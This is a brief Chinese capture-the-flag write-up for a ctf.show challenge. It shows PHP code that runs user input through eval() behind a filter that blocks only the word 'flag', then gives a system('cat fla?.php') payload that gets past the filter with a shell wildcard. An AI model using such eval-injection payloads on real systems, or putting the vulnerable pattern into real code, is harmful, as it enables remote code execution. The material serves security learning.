代码审计嘛
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
就过滤了一个flag,简单
payload:
http://7739c9b6-32d1-4535-b359-a1e191234215.challenge.ctf.show/?c=system('cat fla?.php');
// 这里涉及的知识点是bash的通配符,问好 ? 代表一个任意字符,星号 * 代表任意数量个任意字符
flag在注释里